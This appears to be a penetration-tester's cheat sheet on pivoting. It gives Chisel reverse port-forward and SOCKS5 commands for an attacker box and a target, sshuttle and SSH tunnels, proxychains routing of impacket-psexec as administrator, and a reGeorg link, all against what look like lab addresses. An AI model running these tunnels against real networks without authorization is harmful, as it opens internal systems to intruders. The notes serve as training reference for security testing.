# Port Forwarding - Tunneling

## Chisel

* <https://github.com/jpillora/chisel/releases>

Portforwarding,&#x20;

Forwarding remote port 8080 to localhost

On kali,

```
./chisel server --reverse --port 9001

example,
./chisel server --reverse --port 9001
```

On target,

```
.\chisel.exe client <kali-ip>:9001 R:<local-port>:127.0.0.1:<target-port>

example,
.\chisel.exe client 10.10.14.38:9001 R:8080:127.0.0.1:8080
```

Sock5 proxy with chisel,

On kali,

```
./chisel server -p 9001 --socks5 --reverse
```

On target,

```
chisel client <kali-ip>:9001 R:5000:socks
```

R:5000:socks

* the `R` means that we want to perform a reverse port forward.&#x20;
* `5000` will be the port on the attacker machine that will act as the entry point to our SOCKS5 proxy; and
* &#x20;`socks` simply means we are using the SOCKS protocol.

Add `socks5 127.0.0.1 5000` to `/etc/proxychains.conf`

* Don't forget to disable DNS resolution over proxychains.

udp port forward

```
/opt/chisel/chisel_1.7.7_linux_386 server --reverse --port 9001
./chisel_1.7.7_linux_386  client 192.168.119.203:9001 R:10.1.1.89:1978/udp
```

## Sshuttle

This is the best tunneling tool

* <https://github.com/sshuttle/sshuttle>

Standalone (compiled and ready to be executed) binaries,

* <https://github.com/rholder/sshuttle-binary/releases/tag/v0.78.5>
* <https://github.com/rholder/sshuttle-binary/releases/tag/v0.78.0>

```
sshuttle -vvv -e 'ssh -i id_rsa' -r morph3@10.11.1.252 -x 10.11.1.252 10.2.2.1/24
```

```
sudo ./sshuttle -e "ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -c 3des-cbc" -r morph3@10.11.1.252:22000 10.2.2.1/24
```

## SSH

Port forwarding,&#x20;

forwards remote host 10.10.10.99:2049 back to localhost:2049

```
ssh -L 127.0.0.1:1978:10.10.10.99:1978 morph3@1.3.3.7
```

Tunneling,

```
ssh morph3@1.3.3.7 -p22000 -D 127.0.0.1:1080
```

```
proxychains firefox
proxychains impacket-psexec administrator@10.13.37.1
```

## Regeorg

* <https://github.com/sensepost/reGeorg>